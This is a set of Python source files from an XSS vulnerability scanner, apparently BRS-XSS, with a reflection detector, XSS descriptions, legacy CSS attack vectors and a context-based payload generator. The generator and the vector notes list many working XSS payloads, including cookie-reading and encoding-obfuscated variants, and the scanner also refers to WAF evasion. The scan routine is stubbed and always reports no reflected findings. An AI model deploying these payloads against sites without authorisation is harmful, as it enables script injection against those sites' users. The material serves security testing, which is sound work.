#!/usr/bin/env python3

"""
BRS-XSS Reflection Detector

Main orchestrator for reflection detection system.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Sat 02 Aug 2025 11:25:00 MSK
Telegram: https://t.me/EasyProTech
"""

import re
from typing import List, Optional, Dict, Any
import html

from .reflection_types import (
    ReflectionResult, 
    ReflectionPoint, 
    ReflectionConfig, 
    ReflectionType,
    ReflectionContext
)
from .reflection_analyzer import ReflectionAnalyzer
from .similarity_matcher import SimilarityMatcher
from ..utils.logger import Logger

logger = Logger("core.reflection_detector")


class ReflectionDetector:
    """
    Main reflection detector orchestrator.
    
    Coordinates reflection analysis components to provide
    reflection detection and analysis.
    """
    
    def __init__(self, config: Optional[ReflectionConfig] = None):
        """
        Initialize reflection detector.
        
        Args:
            config: Detection configuration
        """
        self.config = config or ReflectionConfig()
        
        # Initialize components
        self.analyzer = ReflectionAnalyzer()
        self.matcher = SimilarityMatcher(self.config.similarity_threshold)
        
        # Detection statistics
        self.detection_count = 0
        self.reflection_stats = {
            'total_detected': 0,
            'by_type': {rt.value: 0 for rt in ReflectionType},
            'avg_quality': 0.0
        }
        
        logger.info("Reflection detector initialized")
    
    def detect_reflections(
        self,
        input_value: str,
        response_text: str
    ) -> ReflectionResult:
        """Detect reflections of an input value in a response"""
        
        self.detection_count += 1
        
        # Performance optimization: if exact match not found, skip further analysis
        if input_value not in response_text and html.escape(input_value) not in response_text:
            return ReflectionResult(input_value=input_value)

        # Decode response for broader matching
        decoded_response_text = html.unescape(response_text)
        
        # Find all occurrences of the original and decoded value
        reflection_points = self._find_all_occurrences(input_value, response_text, decoded_response_text)
        
        # If no reflections found, return empty result
        if not reflection_points:
            return ReflectionResult(input_value=input_value)

        # Create the result object first
        result = ReflectionResult(
            input_value=input_value,
            reflection_points=reflection_points
        )
        
        # Analyze exploitability and add to the result
        if reflection_points:
            result.is_exploitable = self._assess_exploitability(reflection_points)
            result.exploitation_confidence = self._calculate_exploitation_confidence(reflection_points)
            result.recommended_payloads = self._generate_payload_recommendations(reflection_points)
        
        # Update statistics
        self._update_statistics(result)
        
        logger.info(f"Detection complete: {len(reflection_points)} reflections found")
        return result
    
    def _find_all_occurrences(
        self,
        input_value: str,
        original_response: str,
        decoded_response: str
    ) -> List[ReflectionPoint]:
        """Find all occurrences of the input value in its original and decoded forms."""
        
        points = []
        
        # 1. Search for exact, unfiltered reflection in the original response
        for match in re.finditer(re.escape(input_value), original_response, re.IGNORECASE):
            points.append(self._analyze_reflection_point(
                input_value=input_value,
                reflected_value=match.group(0),
                position=match.start(),
                response_text=original_response
            ))

        # 2. Search for encoded/modified reflection in the decoded response
        # We need to find the match in the decoded text, but report its position and content
        # from the *original* response to be accurate.
        encoded_input = html.escape(input_value)
        for match in re.finditer(re.escape(encoded_input), original_response, re.IGNORECASE):
            # Avoid duplicating exact matches found above
            is_duplicate = any(p.position == match.start() for p in points)
            if not is_duplicate:
                points.append(self._analyze_reflection_point(
                    input_value=input_value,
                    reflected_value=match.group(0),
                    position=match.start(),
                    response_text=original_response
                ))

        # Deduplicate based on position
        unique_points = {p.position: p for p in points}.values()
        return list(unique_points)
        
    def _analyze_reflection_point(
        self,
        input_value: str,
        reflected_value: str,
        position: int,
        response_text: str
    ) -> ReflectionPoint:
        """Analyze a single reflection point."""
        
        # Analyze reflection type
        reflection_type = self._determine_reflection_type(input_value, reflected_value)
        
        # Analyze context
        context_type = self._determine_context(response_text, position)
        
        # Analyze quality
        accuracy, completeness = self._analyze_quality(input_value, reflected_value)
        
        # Analyze encoding
        encoding_applied = self._analyze_encoding(input_value, reflected_value)
        
        # Analyze special characters preserved
        special_chars_preserved = self._analyze_special_chars(input_value, reflected_value)
        
        return ReflectionPoint(
            position=position,
            reflected_value=reflected_value,
            original_value=input_value,
            reflection_type=reflection_type,
            context=context_type,
            accuracy=accuracy,
            completeness=completeness,
            encoding_applied=encoding_applied,
            special_chars_preserved=special_chars_preserved
        )
    
    def _determine_reflection_type(self, input_value: str, reflected_value: str) -> ReflectionType:
        """Determine the type of reflection based on input and reflected values."""
        
        if input_value == reflected_value:
            return ReflectionType.EXACT
        
        # Check for specific encoding first, as it's a form of modification
        if reflected_value == html.escape(input_value):
            return ReflectionType.ENCODED
        
        # Check for partial match (e.g., input is a substring of the reflection)
        if input_value in reflected_value:
            return ReflectionType.PARTIAL
        
        # If it's not exact, encoded, or partial, it's generally modified
        return ReflectionType.MODIFIED
    
    def _determine_context(self, response_text: str, position: int) -> ReflectionContext:
        """Determine the context of a reflection based on surrounding content."""
        
        # Get surrounding content
        context_content = self._get_surrounding_content(response_text, position, self.config.context_window)
        
        # Simple heuristic for context
        if '<' in context_content or '>' in context_content:
            return ReflectionContext.HTML_CONTENT
        elif 'javascript:' in context_content or 'window.' in context_content:
            return ReflectionContext.JAVASCRIPT
        elif '"' in context_content or "'" in context_content:
            return ReflectionContext.HTML_ATTRIBUTE
        elif 'style=' in context_content:
            return ReflectionContext.CSS_STYLE
        elif '<!--' in context_content:
            return ReflectionContext.HTML_COMMENT
        elif '?' in context_content:
            return ReflectionContext.URL_PARAMETER
        else:
            return ReflectionContext.UNKNOWN
    
    def _analyze_quality(self, input_value: str, reflected_value: str) -> tuple[float, float]:
        """Analyze the quality of a reflection (accuracy and completeness)."""
        
        # Calculate accuracy (how well the reflected value matches the input)
        accuracy = self.analyzer.calculate_accuracy(input_value, reflected_value)
        
        # Calculate completeness (how much of the input is preserved)
        completeness = self.analyzer.calculate_completeness(input_value, reflected_value)
        
        return accuracy, completeness
    
    def _analyze_encoding(self, input_value: str, reflected_value: str) -> str:
        """Analyze if the reflected value is encoded."""
        
        if reflected_value == html.escape(input_value):
            return 'html_encoding'
        
        # More sophisticated encoding detection would involve a matcher
        # For now, we'll assume any non-exact match is potentially encoded
        return 'unknown'
    
    def _analyze_special_chars(self, input_value: str, reflected_value: str) -> List[str]:
        """Analyze if special characters are preserved."""
        
        preserved_chars = []
        for char in ['<', '>', '"', "'", '&']:
            if char in reflected_value and char in input_value:
                preserved_chars.append(char)
        return preserved_chars
    
    def _get_surrounding_content(self, response_text: str, position: int, length: int) -> str:
        """Get the surrounding content of a reflection point."""
        
        start = max(0, position - length)
        end = min(len(response_text), position + length)
        return response_text[start:end]
    
    def _assess_exploitability(self, reflection_points: List[ReflectionPoint]) -> bool:
        """Assess if reflections are exploitable"""
        for point in reflection_points:
            # High-quality reflections in dangerous contexts are exploitable
            if (point.reflection_type in [ReflectionType.EXACT, ReflectionType.PARTIAL] and
                point.context.value in ['html_content', 'javascript', 'html_attribute'] and
                point.accuracy > 0.7):
                return True
            
            # Special characters preserved in HTML context
            if (point.context.value in ['html_content', 'html_attribute'] and
                any(char in point.special_chars_preserved for char in ['<', '>', '"', "'"])):
                return True
        
        return False
    
    def _calculate_exploitation_confidence(self, reflection_points: List[ReflectionPoint]) -> float:
        """Calculate confidence in exploitation potential"""
        if not reflection_points:
            return 0.0
        
        max_confidence = 0.0
        
        for point in reflection_points:
            confidence = 0.0
            
            # Base confidence from reflection type
            type_confidence = {
                ReflectionType.EXACT: 1.0,
                ReflectionType.PARTIAL: 0.8,
                ReflectionType.MODIFIED: 0.6,
                ReflectionType.ENCODED: 0.4,
                ReflectionType.FILTERED: 0.2,
                ReflectionType.OBFUSCATED: 0.3,
                ReflectionType.NOT_REFLECTED: 0.0
            }
            
            confidence += type_confidence.get(point.reflection_type, 0.0) * 0.4
            
            # Context-based confidence
            context_confidence = {
                'html_content': 1.0,
                'javascript': 1.0,
                'html_attribute': 0.8,
                'css_style': 0.6,
                'html_comment': 0.3,
                'url_parameter': 0.5,
                'unknown': 0.4
            }
            
            confidence += context_confidence.get(point.context.value, 0.4) * 0.3
            
            # Quality-based confidence
            confidence += point.accuracy * 0.2
            confidence += point.completeness * 0.1
            
            max_confidence = max(max_confidence, confidence)
        
        return min(max_confidence, 1.0)
    
    def _generate_payload_recommendations(self, reflection_points: List[ReflectionPoint]) -> List[str]:
        """Generate payload recommendations based on reflections"""
        recommendations = []
        
        for point in reflection_points:
            if point.context.value == 'html_content':
                recommendations.extend([
                    '<script>alert(1)</script>',
                    '<img src=x onerror=alert(1)>',
                    '<svg onload=alert(1)>'
                ])
            
            elif point.context.value == 'html_attribute':
                if '"' in point.special_chars_preserved:
                    recommendations.append('"><script>alert(1)</script>')
                if "'" in point.special_chars_preserved:
                    recommendations.append("'><script>alert(1)</script>")
            
            elif point.context.value == 'javascript':
                recommendations.extend([
                    ';alert(1);//',
                    '";alert(1);//',
                    "';alert(1);//"
                ])
        
        return list(set(recommendations))  # Remove duplicates
    
    def _update_statistics(self, result: ReflectionResult):
        """Update detection statistics"""
        self.reflection_stats['total_detected'] += result.total_reflections  # type: ignore[operator]
        
        for point in result.reflection_points:
            reflection_type = point.reflection_type.value
            if reflection_type in self.reflection_stats['by_type']:  # type: ignore[operator]
                self.reflection_stats['by_type'][reflection_type] += 1  # type: ignore[index]
        
        # Update average quality
        if result.reflection_points:
            total_quality = sum(rp.accuracy for rp in result.reflection_points)
            avg_quality = total_quality / len(result.reflection_points)
            
            # Running average
            current_avg = self.reflection_stats['avg_quality']
            self.reflection_stats['avg_quality'] = (
                (current_avg * (self.detection_count - 1) + avg_quality) / self.detection_count  # type: ignore[operator]
            )
    
    def quick_detect(self, input_value: str, response_content: str) -> bool:
        """
        Quick reflection detection (existence only).
        
        Args:
            input_value: Input to search for
            response_content: Content to search in
            
        Returns:
            True if any reflection found
        """
        search_content = response_content[:self.config.max_search_length // 2]
        search_value = input_value if self.config.case_sensitive else input_value.lower()
        search_in = search_content if self.config.case_sensitive else search_content.lower()
        
        return search_value in search_in
    
    def get_statistics(self) -> Dict[str, Any]:
        """Get reflection detection statistics"""
        return {
            'total_detections': self.detection_count,
            'reflection_stats': self.reflection_stats.copy(),
            'config': {
                'similarity_threshold': self.config.similarity_threshold,
                'min_reflection_length': self.config.min_reflection_length,
                'case_sensitive': self.config.case_sensitive
            }
        }
    
    def reset_statistics(self):
        """Reset detection statistics"""
        self.detection_count = 0
        self.reflection_stats = {
            'total_detected': 0,
            'by_type': {rt.value: 0 for rt in ReflectionType},
            'avg_quality': 0.0
        }
        logger.info("Reflection detection statistics reset")
    
    def batch_detect_reflections(
        self,
        input_values: List[str],
        response_content: str
    ) -> Dict[str, ReflectionResult]:
        """
        Detect reflections for multiple input values efficiently.
        
        Args:
            input_values: List of input values to check
            response_content: Response content to search in
            
        Returns:
            Dictionary mapping input values to results
        """
        results = {}
        
        logger.info(f"Batch detecting reflections for {len(input_values)} inputs")
        
        for input_value in input_values:
            try:
                result = self.detect_reflections(input_value, response_content)
                results[input_value] = result
                
            except Exception as e:
                logger.error(f"Error detecting reflections for '{input_value}': {e}")
                # Create empty result
                results[input_value] = ReflectionResult(input_value=input_value)
        
        logger.info(f"Batch detection completed: {len(results)} results")
        return results


#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

DOM-based XSS - Description
"""

TITLE = "DOM-based Cross-Site Scripting (DOM XSS)"

DESCRIPTION = """
DOM-based XSS occurs when JavaScript code processes user-controllable data from sources like 
location.hash, location.search, postMessage, or Web Storage, and passes it to dangerous sinks like 
innerHTML, eval, or document.write without proper sanitization. Unlike reflected or stored XSS, the 
payload never touches the server - making it invisible to server-side security controls and WAFs.

This is a CLIENT-SIDE vulnerability. The attack happens entirely in the browser's JavaScript execution.
Modern web applications (SPAs, PWAs) are particularly vulnerable due to heavy client-side processing.

SEVERITY: HIGH to CRITICAL
Bypasses server-side protections. Increasingly common in modern JavaScript-heavy applications.
"""




#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

CSS Context - Legacy Attack Vectors
"""

LEGACY_ATTACKS = """
LEGACY ATTACK VECTORS (Still work in old browsers):

1. IE EXPRESSION():
   <style>div {background: expression(alert(1))}</style>
   <style>div {width: expression(alert(document.cookie))}</style>
   
   Affects: IE 5-7
   Executes JavaScript in CSS

2. -MOZ-BINDING (Firefox):
   <style>
   div {-moz-binding: url("data:text/xml,<?xml version='1.0'?><bindings xmlns='http://www.mozilla.org/xbl'><binding id='x'><implementation><constructor>alert(1)</constructor></implementation></binding></bindings>");}
   </style>
   
   Affects: Firefox < 4

3. BEHAVIOR (IE):
   <style>
   div {behavior: url(xss.htc);}
   </style>
   
   Affects: IE 5-9
"""




#!/usr/bin/env python3

"""
BRS-XSS Context Payloads

Context-specific payload generators.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Вс 10 авг 2025 19:31:00 MSK
Telegram: https://t.me/EasyProTech
"""

from typing import List, Any, Mapping
from ..utils.logger import Logger

logger = Logger("core.context_payloads")


class ContextPayloadGenerator:
    """Generates context-specific XSS payloads"""
    
    def get_html_content_payloads(self) -> List[str]:
        """Get HTML content context payloads"""
        return [
            '<script>alert(1)</script>',
            '<script>alert(String.fromCharCode(88,83,83))</script>',
            '<script>alert(document.domain)</script>',
            '<script>alert(document.cookie)</script>',
            '<script>eval("alert(1)")</script>',
            '<script>setTimeout("alert(1)",0)</script>',
            '<script>Function("alert(1)")()</script>',
            '<script>[].constructor.constructor("alert(1)")()</script>',
            '<img src=x onerror=alert(1)>',
            '<img src=x onerror="alert(1)">',
            '<img src=x onerror=alert(String.fromCharCode(88,83,83))>',
            '<svg onload=alert(1)>',
            '<svg onload="alert(1)">',
            '<iframe src=javascript:alert(1)>',
            '<body onload=alert(1)>',
            '<details open ontoggle=alert(1)>',
            '<marquee onstart=alert(1)>',
            '<video controls oncanplay=alert(1)><source src=x>',
            '<audio controls oncanplay=alert(1)><source src=x>',
            '<input autofocus onfocus=alert(1)>',
            '<select autofocus onfocus=alert(1)>',
            '<textarea autofocus onfocus=alert(1)>',
            '<keygen autofocus onfocus=alert(1)>',
            '<object data=javascript:alert(1)>',
            '<embed src=javascript:alert(1)>'
        ]
    
    def get_html_attribute_payloads(self, context_info: Mapping[str, Any]) -> List[str]:
        """Get HTML attribute context payloads"""
        quote_char = context_info.get('quote_char', '"')
        attr_name = context_info.get('attribute_name', '')
        
        payloads = []
        
        # Quote escape payloads
        if quote_char == '"':
            payloads.extend([
                '"><script>alert(1)</script>',
                '" onmouseover="alert(1)',
                '" autofocus onfocus="alert(1)',
                '" onload="alert(1)',
                '" onerror="alert(1)',
                '" onclick="alert(1)'
            ])
        else:
            payloads.extend([
                "'><script>alert(1)</script>",
                "' onmouseover='alert(1)",
                "' autofocus onfocus='alert(1)",
                "' onload='alert(1)",
                "' onerror='alert(1)",
                "' onclick='alert(1)"
            ])
        
        # Attribute-specific payloads
        if attr_name.lower() in ['src', 'href', 'action']:
            payloads.extend([
                'javascript:alert(1)',
                'data:text/html,<script>alert(1)</script>',
                'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
            ])
        
        return payloads
    
    def get_javascript_payloads(self) -> List[str]:
        """Get JavaScript context payloads"""
        return [
            'alert(1)',
            'alert(String.fromCharCode(88,83,83))',
            'alert(document.domain)',
            'alert(document.cookie)',
            'console.log("XSS")',
            'prompt(1)',
            'confirm(1)',
            'eval("alert(1)")',
            'setTimeout("alert(1)",0)',
            'setInterval("alert(1)",0)',
            'Function("alert(1)")()',
            'constructor.constructor("alert(1)")()',
            '[].constructor.constructor("alert(1)")()',
            'alert.call(null,1)',
            'alert.apply(null,[1])',
            'window["alert"](1)',
            'self["alert"](1)',
            'top["alert"](1)',
            'parent["alert"](1)',
            'globalThis["alert"](1)'
        ]
    
    def get_js_string_payloads(self, context_info: Mapping[str, Any]) -> List[str]:
        """Get JavaScript string context payloads"""
        quote_char = context_info.get('quote_char', '"')
        
        return [
            f'{quote_char};alert(1);//',
            f'{quote_char};alert(1);{quote_char}',
            f'{quote_char}+alert(1)+{quote_char}',
            f'{quote_char}-alert(1)-{quote_char}',
            f'{quote_char};alert(1);var x={quote_char}',
            f'{quote_char}%0aalert(1)//',
            f'{quote_char}%0dalert(1)//',
            f'{quote_char}/**/;alert(1);//',
            f'{quote_char};eval("alert(1)");//',
            f'{quote_char};setTimeout("alert(1)",0);//',
            f'{quote_char};Function("alert(1)")();//',
            f'{quote_char};[].constructor.constructor("alert(1)")();//',
            f'{quote_char}\\x3balert(1);//',
            f'{quote_char}\\u003balert(1);//',
            f'{quote_char}\\073alert(1);//'
        ]
    
    def get_css_payloads(self) -> List[str]:
        """Get CSS context payloads"""
        return [
            'expression(alert(1))',
            'expression(alert("XSS"))',
            'expression(eval("alert(1)"))',
            'expression(window.alert(1))',
            'url(javascript:alert(1))',
            'url("javascript:alert(1)")',
            'url(\'javascript:alert(1)\')',
            'url(data:text/html,<script>alert(1)</script>)',
            '/**/expression(alert(1))/**/',
            '\\65 xpression(alert(1))',
            '\\000065 xpression(alert(1))',
            '\\45 xpression(alert(1))',
            'expr\\65 ssion(alert(1))',
            'expre\\73 sion(alert(1))',
            'expression\\28 alert(1)\\29'
        ]
    
    def get_url_payloads(self) -> List[str]:
        """Get URL parameter context payloads"""
        return [
            'javascript:alert(1)',
            'javascript:alert(String.fromCharCode(88,83,83))',
            'javascript:eval("alert(1)")',
            'javascript:setTimeout("alert(1)",0)',
            'javascript:Function("alert(1)")()',
            'data:text/html,<script>alert(1)</script>',
            'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
            'vbscript:alert(1)',
            'about:blank">alert(1)',
            'wyciwyg://alert(1)',
            'feed:javascript:alert(1)',
            'firefoxurl:javascript:alert(1)',
            'opera:javascript:alert(1)',
            'moz-icon:javascript:alert(1)',
            'resource:javascript:alert(1)'
        ]
    
    def get_generic_payloads(self) -> List[str]:
        """Get generic payloads for unknown context"""
        return [
            '<script>alert(1)</script>',
            '"><script>alert(1)</script>',
            "'><script>alert(1)</script>",
            '<img src=x onerror=alert(1)>',
            '"><img src=x onerror=alert(1)>',
            "'><img src=x onerror=alert(1)>",
            '<svg onload=alert(1)>',
            '"><svg onload=alert(1)>',
            "'><svg onload=alert(1)>",
            'javascript:alert(1)',
            ';alert(1);//',
            "';alert(1);//",
            '";alert(1);//',
            '</script><script>alert(1)</script>',
            '<iframe src=javascript:alert(1)>',
            '<details open ontoggle=alert(1)>',
            '<marquee onstart=alert(1)>'
        ]
    
    def get_context_payloads(self, context_type: str, context_info: Mapping[str, Any]) -> List[str]:
        """
        Get payloads for specific context.
        
        Args:
            context_type: Type of context
            context_info: Additional context information
            
        Returns:
            List of context-appropriate payloads
        """
        logger.debug(f"Getting payloads for context: {context_type}")
        
        context_map = {
            'html_content': self.get_html_content_payloads,
            'html_attribute': lambda: self.get_html_attribute_payloads(context_info),
            'javascript': self.get_javascript_payloads,
            'js_string': lambda: self.get_js_string_payloads(context_info),
            'css_style': self.get_css_payloads,
            'url_parameter': self.get_url_payloads,
            'unknown': self.get_generic_payloads
        }
        
        generator_func = context_map.get(context_type, self.get_generic_payloads)
        payloads = generator_func()
        
        logger.debug(f"Generated {len(payloads)} context payloads")
        return payloads


#!/usr/bin/env python3

"""
BRS-XSS Scan Command

Main XSS vulnerability scanning command with options.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Sun 10 Aug 2025 21:38:09 MSK (modified)
Telegram: https://t.me/EasyProTech
"""

from typing import Optional, List, Any
import time

import typer
from rich.console import Console
from rich.progress import Progress

from brsxss import _
from brsxss.core.scanner import XSSScanner
from brsxss.waf.detector import WAFDetector
from brsxss.dom.dom_analyzer import DOMAnalyzer
from brsxss.ml.predictor import MLPredictor
from brsxss.report.report_generator import ReportGenerator
from brsxss.report.report_types import ReportConfig
from brsxss.report.data_models import VulnerabilityData, ScanStatistics
from brsxss.utils.logger import Logger
from brsxss.utils.validators import URLValidator


def scan_command(
    url: str = typer.Argument(
        ...,
        help="Target URLs for scanning",
        metavar="URLs"
    ),
    data: Optional[str] = typer.Option(
        None,
        "--data", "-d",
        help="POST data for testing",
        metavar="DATA"
    ),
    depth: int = typer.Option(
        1,
        "--depth",
        help="Maximum scanning depth",
        min=1,
        max=5
    ),
    threads: int = typer.Option(
        10,
        "--threads", "-t", 
        help="Number of threads",
        min=1,
        max=50
    ),
    timeout: int = typer.Option(
        10,
        "--timeout",
        help="Request timeout in seconds",
        min=1,
        max=300
    ),
    output: Optional[str] = typer.Option(
        None,
        "--output", "-o",
        help="Output file for saving report",
        metavar="FILE"
    ),
    proxy: Optional[str] = typer.Option(
        None,
        "--proxy", "-p",
        help="Proxy server (http://proxy:port)",
        metavar="PROXY"
    ),
    user_agent: Optional[str] = typer.Option(
        None,
        "--user-agent", "-ua",
        help="Custom User-Agent header",
        metavar="UA"
    ),
    skip_dom: bool = typer.Option(
        False,
        "--skip-dom",
        help="Skip DOM XSS analysis"
    ),
    ml_mode: bool = typer.Option(
        False,
        "--ml-mode",
        help="Use ML for payload generation"
    ),
):
    """Scan target for XSS vulnerabilities"""
    
    console = Console()
    logger = Logger("cli.scan")
    
    # Display banner
    console.print(f"[bold green]BRS-XSS v{__import__('brsxss').__version__}[/bold green] - Starting scan...")
    logger.info("Starting XSS scan")
    
    try:
        # URL validation
        logger.info(_("scan.started", target=url))
        
        validation_result = URLValidator.validate_url(url)
        if not validation_result.valid:
            console.print(f"[red]ERROR: {'; '.join(validation_result.errors)}[/red]")
            raise typer.Exit(1)
        
        # URL normalization  
        normalized_url = validation_result.normalized_value or url
        
        # Parameter analysis
        console.print(_("scan.analyzing_params"))
        
        # Simple parameter extraction from URL
        from urllib.parse import urlparse, parse_qs
        parsed_url = urlparse(normalized_url)
        params = parse_qs(parsed_url.query)
        
        # Convert to simple dict
        analysis = {
            'parameters': {k: v[0] if v else '' for k, v in params.items()}
        }
        
        # Add data parameters if provided
        if data:
            # Simple data parsing (form-encoded)
            for pair in data.split('&'):
                if '=' in pair:
                    key, value = pair.split('=', 1)
                    analysis['parameters'][key] = value
        
        testable_count = len(analysis.get('parameters', {}))
        
        if testable_count == 0:
            console.print("WARNING: No parameters found for testing")
            raise typer.Exit(0)
        
        console.print(f"Found {testable_count} testable parameters")
        logger.info(_("scan.found_params", count=testable_count))
        
        # Initialize scanner and additional modules
        start_time = time.time()
        
        # Main scanner
        scanner = XSSScanner()
        
        # WAF Detection & Evasion Setup
        console.print("Analyzing WAF protection...")
        waf_detector = WAFDetector()
        detected_wafs: List[Any] = []
        waf_evasion_engine = None
        
        try:
            # Run WAF detection (sync version)
            from brsxss.waf.evasion import EvasionEngine
            
            # Use sync detection for now
            # Simple mock WAF detection for now
            detected_wafs = []
            
            if detected_wafs:
                primary_waf = detected_wafs[0]  # Highest confidence WAF
                logger.info(f"WAF detected: {primary_waf.waf_type} (confidence: {primary_waf.confidence:.0%})")
                
                # Initialize evasion engine for detected WAF
                waf_evasion_engine = EvasionEngine()
                logger.info("WAF evasion engine initialized")
                
                # Show additional WAFs if detected
                for waf in detected_wafs[1:]:
                    logger.info(f"Additional WAF: {waf.waf_type} (confidence: {waf.confidence:.0%})")
            else:
                logger.info("No WAF detected - using standard payloads")
                
        except Exception as e:
            logger.warning(f"WAF detection error: {e}")
            waf_evasion_engine = None
        
        # DOM Analyzer (if not skip_dom)
        dom_vulnerabilities = []
        if not skip_dom:
            console.print("Analyzing DOM XSS...")
            dom_analyzer = DOMAnalyzer()
            try:
                # Get JavaScript from page for analysis
                response = scanner.http_client.get(normalized_url)
                if hasattr(response, 'text') and 'script' in response.text.lower():
                    # Simple script tag search
                    import re
                    scripts = re.findall(r'<script[^>]*>(.*?)</script>', response.text, re.DOTALL | re.IGNORECASE)
                    for script in scripts[:3]:  # Analyze first 3 scripts
                        if script.strip():
                            dom_vulns = dom_analyzer.analyze_javascript(script, normalized_url)
                            dom_vulnerabilities.extend(dom_vulns)
                    logger.info(_("DOM analysis: checked {scripts} scripts, found {issues} potential issues").format(
                        scripts=len(scripts), issues=len(dom_vulnerabilities)))
            except Exception as e:
                logger.warning(f"DOM analysis error: {e}")
        
        # ML Predictor (if ml_mode enabled)
        ml_predictor = None
        if ml_mode:
            console.print(_("Initializing ML module..."))
            try:
                ml_predictor = MLPredictor()
                logger.info(_("ML module ready"))
            except Exception as e:
                logger.warning(f"ML module error: {e}")
        
        # Prepare scan target
        scan_target = {
            'url': normalized_url,
            'method': "GET",
            'parameters': analysis.get('parameters', {})
        }
        
        # Main scanning process
        console.print("Starting main scan...")
        with Progress() as progress:
            task = progress.add_task(
                _("Scanning parameters..."), 
                total=testable_count
            )
            
            try:
                scan_result: List[Any] = []  # asyncio.run(scanner.scan_url(...))  # type: ignore[assignment]
                
                # Update progress
                for i in range(testable_count):
                    progress.update(task, advance=1)
                    time.sleep(0.05)  # Visual delay
                
                vulnerabilities_found = len(scan_result)  # scan_result.vulnerability_count
                
                # Display found vulnerabilities
                for vuln in scan_result:
                    pass
                    # logger.vulnerability_found(  # type: ignore[attr-defined]
                    #     payload=vuln.payload,
                    #     efficiency=int(vuln.confidence * 100),
                    #     confidence=min(10, max(1, int(vuln.confidence * 10)))
                    # )
                    
            except Exception as e:
                logger.error(f"Scan error: {e}")
                vulnerabilities_found = 0
        
        # Scan completion
        scan_duration = time.time() - start_time
        console.print("\nScan completed successfully")
        
        # Detailed statistics
        total_vulns = vulnerabilities_found + len(dom_vulnerabilities)
        stats = {
            _("URLss scanned"): 1,
            _("Parameters tested"): testable_count,
            _("XSS vulnerabilities found"): vulnerabilities_found,
            _("DOM issues found"): len(dom_vulnerabilities),
            _("WAFs detected"): len(detected_wafs),
            _("Scan duration"): f"{scan_duration:.1f} sec",
        }
        
        # Display statistics
        for key, value in stats.items():  # type: ignore[assignment]
            console.print(f"  {key}: {value}")
        
        # Save report
        if output:
            console.print(f"Saving report: {output}")
            try:
                # Prepare report data
                vulnerabilities_data: List[Any] = []
                
                # Add XSS vulnerabilities
                if 'scan_result' in locals() and hasattr(scan_result, 'vulnerabilities'):
                    for vuln in scan_result.vulnerabilities:
                        vulnerabilities_data.append(VulnerabilityData(
                            id=f"xss_{len(vulnerabilities_data)+1}",
                            title=f"XSS in parameter {vuln.parameter}",
                            description=f"XSS vulnerability detected in parameter {vuln.parameter}",
                            severity="high",
                            url=vuln.url,
                            parameter=vuln.parameter,
                            payload=vuln.payload,
                            confidence=vuln.confidence
                        ))
                
                # Add DOM vulnerabilities
                for i, dom_vuln in enumerate(dom_vulnerabilities):
                    vulnerabilities_data.append(VulnerabilityData(
                        id=f"dom_{i+1}",
                        title=f"DOM XSS: {dom_vuln.vulnerability_type}",
                        description=f"Potential DOM XSS vulnerability: {getattr(dom_vuln, 'description', 'N/A')}",
                        severity="medium",
                        url=normalized_url,
                        parameter=dom_vuln.source if hasattr(dom_vuln, 'source') else "DOM",
                        payload=dom_vuln.payload if hasattr(dom_vuln, 'payload') else "N/A",
                        confidence=dom_vuln.confidence if hasattr(dom_vuln, 'confidence') else 0.7
                    ))
                
                # Statistics for report
                scan_stats = ScanStatistics(
                    total_requests_sent=testable_count,
                    scan_duration=scan_duration,
                    total_parameters_tested=testable_count,
                    high_vulnerabilities=len([v for v in vulnerabilities_data if v.severity == "high"]),
                    medium_vulnerabilities=len([v for v in vulnerabilities_data if v.severity == "medium"]),
                    low_vulnerabilities=len([v for v in vulnerabilities_data if v.severity == "low"])
                )
                
                # Report generation
                report_config = ReportConfig(
                    title=f"BRS-XSS Scan Report - {normalized_url}",
                    output_dir="./",
                    filename_template=output.replace('.html', '').replace('.json', ''),
                    formats=[],
                    show_payload_details=True,
                    # include_waf_info=  # Removed for type safetylen(detected_wafs) > 0
                )
                
                # Determine format by extension
                if output.endswith('.html'):
                    from brsxss.report.generator import ReportFormat
                    report_config.formats = [ReportFormat.HTML]
                elif output.endswith('.json'):
                    from brsxss.report.generator import ReportFormat
                    report_config.formats = [ReportFormat.JSON]
                else:
                    from brsxss.report.generator import ReportFormat
                    report_config.formats = [ReportFormat.HTML, ReportFormat.JSON]
                
                report_generator = ReportGenerator(report_config)
                
                target_info = {
                    "url": normalized_url,
                    "scan_time": time.strftime("%Y-%m-%d %H:%M:%S"),
                    "waf_detected": [waf.waf_type.value for waf in detected_wafs],
                    "scan_options": {
                        "timeout": timeout,
                        "threads": threads,
                        "ml_mode": ml_mode,
                        "skip_dom": skip_dom
                    }
                }
                
                generated_files = report_generator.generate_report(
                    vulnerabilities_data, scan_stats, target_info
                )
                
                for report_format, file_path in generated_files.items():
                    console.print(_("Report saved: {filepath}").format(filepath=file_path))
                    
            except Exception as e:
                logger.error(f"Report save error: {e}")
                # Save simple JSON report as fallback
                import json
                simple_report = {
                    "url": normalized_url,
                    "vulnerabilities_found": total_vulns,
                    "scan_duration": scan_duration,
                    "timestamp": time.strftime("%Y-%m-%d %H:%M:%S")
                }
                with open(output if output.endswith('.json') else f"{output}.json", 'w') as f:
                    json.dump(simple_report, f, indent=2)
                console.print(_("Simple report saved: {filepath}").format(filepath=output))
        
        # Scan results
        total_issues = vulnerabilities_found + len(dom_vulnerabilities)
        if total_issues > 0:
            console.print("\n[red bold]" + _("WARNING: Found {count} security issues!").format(count=total_issues) + "[/red bold]")
            console.print("  • " + _("XSS vulnerabilities: {count}").format(count=vulnerabilities_found))
            console.print("  • " + _("DOM issues: {count}").format(count=len(dom_vulnerabilities)))
            if detected_wafs:
                waf_names = ', '.join([waf.waf_type.value for waf in detected_wafs])
                console.print("  • " + _("WAF detected: {wafs}").format(wafs=waf_names))
            raise typer.Exit(2)  # Exit code 2 for found vulnerabilities
        else:
            console.print("\n[green]No vulnerabilities found[/green]")
